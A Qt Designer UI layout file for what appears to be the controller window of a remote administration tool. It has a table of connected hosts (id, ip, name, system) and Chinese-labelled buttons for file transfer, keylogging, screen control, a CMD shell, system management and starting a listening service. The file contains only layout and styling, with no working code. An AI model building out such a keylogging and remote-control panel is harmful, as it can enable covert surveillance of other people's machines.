<?xml version="1.0" encoding="UTF-8"?>
<ui version="4.0">
 <class>MainWindow</class>
 <widget class="QMainWindow" name="MainWindow">
  <property name="geometry">
   <rect>
    <x>0</x>
    <y>0</y>
    <width>1194</width>
    <height>679</height>
   </rect>
  </property>
  <property name="windowTitle">
   <string>MainWindow</string>
  </property>
  <property name="styleSheet">
   <string notr="true">border-top-left-radius:10px;
border-top-right-radius:10px;
border-bottom-left-radius: 10px;
border-bottom-right-radius: 10px;</string>
  </property>
  <widget class="QWidget" name="centralWidget">
   <property name="styleSheet">
    <string notr="true">border-top-left-radius:10px;
border-top-right-radius:10px;
border-bottom-left-radius: 10px;
border-bottom-right-radius: 10px;</string>
   </property>
   <widget class="QTableWidget" name="tableWidget">
    <property name="geometry">
     <rect>
      <x>20</x>
      <y>110</y>
      <width>1001</width>
      <height>551</height>
     </rect>
    </property>
    <property name="styleSheet">
     <string notr="true">background-color: rgb(255, 243, 233);</string>
    </property>
    <attribute name="horizontalHeaderCascadingSectionResizes">
     <bool>false</bool>
    </attribute>
    <attribute name="verticalHeaderShowSortIndicator" stdset="0">
     <bool>false</bool>
    </attribute>
    <column>
     <property name="text">
      <string>id</string>
     </property>
    </column>
    <column>
     <property name="text">
      <string>ip</string>
     </property>
    </column>
    <column>
     <property name="text">
      <string>name</string>
     </property>
    </column>
    <column>
     <property name="text">
      <string>system</string>
     </property>
    </column>
   </widget>
   <widget class="QPushButton" name="ButtonFile">
    <property name="geometry">
     <rect>
      <x>30</x>
      <y>40</y>
      <width>131</width>
      <height>71</height>
     </rect>
    </property>
    <property name="styleSheet">
     <string notr="true">border-bottom-color: qlineargradient(spread:pad, x1:0, y1:0, x2:1, y2:0, stop:0 rgba(255, 178, 102, 255), stop:0.55 rgba(235, 148, 61, 255), stop:0.98 rgba(0, 0, 0, 255), stop:1 rgba(0, 0, 0, 0));</string>
    </property>
    <property name="text">
     <string>文件传输</string>
    </property>
    <property name="icon">
     <iconset resource="resource.qrc">
      <normaloff>:/Document_File_128px_1072799_easyicon.net.ico</normaloff>:/Document_File_128px_1072799_easyicon.net.ico</iconset>
    </property>
    <property name="iconSize">
     <size>
      <width>64</width>
      <height>50</height>
     </size>
    </property>
   </widget>
   <widget class="QPushButton" name="ButtonKeyboard">
    <property name="geometry">
     <rect>
      <x>160</x>
      <y>40</y>
      <width>131</width>
      <height>71</height>
     </rect>
    </property>
    <property name="styleSheet">
     <string notr="true"/>
    </property>
    <property name="text">
     <string>键盘记录</string>
    </property>
    <property name="icon">
     <iconset resource="resource.qrc">
      <normaloff>:/keyboard_128px_1225693_easyicon.net.ico</normaloff>:/keyboard_128px_1225693_easyicon.net.ico</iconset>
    </property>
    <property name="iconSize">
     <size>
      <width>64</width>
      <height>50</height>
     </size>
    </property>
   </widget>
   <widget class="QPushButton" name="ButtonScreen">
    <property name="geometry">
     <rect>
      <x>290</x>
      <y>40</y>
      <width>131</width>
      <height>71</height>
     </rect>
    </property>
    <property name="styleSheet">
     <string notr="true"/>
    </property>
    <property name="text">
     <string>屏幕控制</string>
    </property>
    <property name="icon">
     <iconset resource="resource.qrc">
      <normaloff>:/screen_128px_1222102_easyicon.net.ico</normaloff>:/screen_128px_1222102_easyicon.net.ico</iconset>
    </property>
    <property name="iconSize">
     <size>
      <width>64</width>
      <height>50</height>
     </size>
    </property>
   </widget>
   <widget class="QPushButton" name="ButtonShell">
    <property name="geometry">
     <rect>
      <x>420</x>
      <y>40</y>
      <width>131</width>
      <height>71</height>
     </rect>
    </property>
    <property name="styleSheet">
     <string notr="true"/>
    </property>
    <property name="text">
     <string>CMD</string>
    </property>
    <property name="icon">
     <iconset resource="resource.qrc">
      <normaloff>:/Terminal_cmd_128px_1100558_easyicon.net.ico</normaloff>:/Terminal_cmd_128px_1100558_easyicon.net.ico</iconset>
    </property>
    <property name="iconSize">
     <size>
      <width>64</width>
      <height>50</height>
     </size>
    </property>
   </widget>
   <widget class="QPushButton" name="ButtonSystem">
    <property name="geometry">
     <rect>
      <x>550</x>
      <y>40</y>
      <width>141</width>
      <height>71</height>
     </rect>
    </property>
    <property name="styleSheet">
     <string notr="true"/>
    </property>
    <property name="text">
     <string>系统管理</string>
    </property>
    <property name="icon">
     <iconset resource="resource.qrc">
      <normaloff>:/system_128px_580135_easyicon.net.ico</normaloff>:/system_128px_580135_easyicon.net.ico</iconset>
    </property>
    <property name="iconSize">
     <size>
      <width>64</width>
      <height>50</height>
     </size>
    </property>
   </widget>
   <widget class="QLineEdit" name="EditPort">
    <property name="geometry">
     <rect>
      <x>1032</x>
      <y>184</y>
      <width>151</width>
      <height>31</height>
     </rect>
    </property>
    <property name="styleSheet">
     <string notr="true">QLineEdit{
border-width:1px;
border-radius:4px;
font-size:12px;color:black;border:1px solid gray;
}
QLineEdit:hover{
border-width:1px;border-radius:4px;font-size:12px;color:black;border:1px solid rgb(70,200,50);
}
</string>
    </property>
   </widget>
   <widget class="QPushButton" name="ButtonStart">
    <property name="geometry">
     <rect>
      <x>1030</x>
      <y>220</y>
      <width>151</width>
      <height>51</height>
     </rect>
    </property>
    <property name="styleSheet">
     <string notr="true">border:2px groove gray;border-radius:10px;padding:2px 4px;</string>
    </property>
    <property name="text">
     <string>开启服务</string>
    </property>
   </widget>
   <widget class="QPushButton" name="ButtonStop">
    <property name="geometry">
     <rect>
      <x>1030</x>
      <y>270</y>
      <width>151</width>
      <height>51</height>
     </rect>
    </property>
    <property name="styleSheet">
     <string notr="true">border:2px groove gray;border-radius:10px;padding:2px 4px;</string>
    </property>
    <property name="text">
     <string>停止服务</string>
    </property>
   </widget>
   <widget class="QLabel" name="label">
    <property name="geometry">
     <rect>
      <x>0</x>
      <y>0</y>
      <width>1194</width>
      <height>41</height>
     </rect>
    </property>
    <property name="styleSheet">
     <string notr="true">background-color: rgb(85, 170, 255);</string>
    </property>
    <property name="text">
     <string/>
    </property>
   </widget>
   <widget class="QPushButton" name="ButtonExit">
    <property name="geometry">
     <rect>
      <x>1140</x>
      <y>10</y>
      <width>31</width>
      <height>31</height>
     </rect>
    </property>
    <property name="text">
     <string/>
    </property>
    <property name="icon">
     <iconset resource="resource.qrc">
      <normaloff>:/exit_quit_24px_16971_easyicon.net.ico</normaloff>:/exit_quit_24px_16971_easyicon.net.ico</iconset>
    </property>
   </widget>
   <widget class="QPushButton" name="ButtonExit_2">
    <property name="geometry">
     <rect>
      <x>1110</x>
      <y>10</y>
      <width>31</width>
      <height>31</height>
     </rect>
    </property>
    <property name="text">
     <string/>
    </property>
    <property name="icon">
     <iconset resource="resource.qrc">
      <normaloff>:/Minimize_Window_128px_1178220_easyicon.net.ico</normaloff>:/Minimize_Window_128px_1178220_easyicon.net.ico</iconset>
    </property>
   </widget>
  </widget>
 </widget>
 <layoutdefault spacing="6" margin="11"/>
 <resources>
  <include location="resource.qrc"/>
 </resources>
 <connections>
  <connection>
   <sender>ButtonExit_2</sender>
   <signal>clicked()</signal>
   <receiver>MainWindow</receiver>
   <slot>showMinimized()</slot>
   <hints>
    <hint type="sourcelabel">
     <x>1132</x>
     <y>30</y>
    </hint>
    <hint type="destinationlabel">
     <x>1113</x>
     <y>102</y>
    </hint>
   </hints>
  </connection>
 </connections>
</ui>
